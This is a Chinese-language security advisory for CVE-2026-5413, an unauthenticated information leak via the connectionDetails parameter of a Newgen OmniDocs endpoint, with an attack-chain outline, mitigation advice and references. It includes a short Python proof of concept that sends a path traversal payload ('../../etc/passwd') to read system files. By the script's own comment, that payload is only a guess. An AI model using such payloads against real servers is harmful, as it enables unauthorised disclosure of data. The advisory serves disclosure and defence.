CVE-2026-5413 CVSS 3.7 低危

CVE-2026-5413 Newgen OmniDocs信息泄露漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5413

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Newgen OmniDocs

漏洞概述

Newgen OmniDocs 12.0.00及之前版本中的/omnidocs/GetWebApiConfiguration接口存在信息泄露漏洞。攻击者可通过操纵connectionDetails参数，远程获取敏感信息。该漏洞攻击复杂度高，但利用代码已公开。

技术细节

该漏洞源于Newgen OmniDocs处理/omnidocs/GetWebApiConfiguration请求时对connectionDetails参数缺乏严格的验证。攻击者无需身份认证即可发送特制请求。由于程序未正确过滤输入，导致服务器响应中包含不应公开的配置信息或内部数据。攻击向量为网络（AV:N），攻击复杂度高（AC:H），成功利用可导致低机密性影响（C:L）。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统运行Newgen OmniDocs且版本低于12.0.00。

STEP 2

2. 发送探测请求

向/omnidocs/GetWebApiConfiguration端点发送包含恶意构造的connectionDetails参数的请求。

STEP 3

3. 信息泄露

服务器处理请求并返回敏感配置信息或文件内容，攻击者解析响应获取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-5413 PoC
url = "http://target-ip/omnidocs/GetWebApiConfiguration"
payload = {
    "connectionDetails": "../../etc/passwd" # Example payload, actual payload depends on specific manipulation
}

try:
    response = requests.post(url, data=payload)
    if response.status_code == 200:
        print("[+] Potential vulnerability found!")
        print(response.text)
    else:
        print("[-] Request failed")
except Exception as e:
    print(f"Error: {e}")

影响范围

Newgen OmniDocs <= 12.0.00

防御指南

临时缓解措施

建议暂时禁用GetWebApiConfiguration功能或通过防火墙规则阻断对该接口的外部访问，直到应用补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5413
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5413
3 Details https://www.cvedetails.com/cve/CVE-2026-5413/
4 VulDB https://vuldb.com/cve/CVE-2026-5413
5 Link https://drive.google.com/file/d/1_cBMYBQo09ZEfgF4FKXh08PneBZoBrVI/view?usp=sharing
6 Link https://vuldb.com/submit/781722
7 Link https://vuldb.com/vuln/354828
8 Link https://vuldb.com/vuln/354828/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表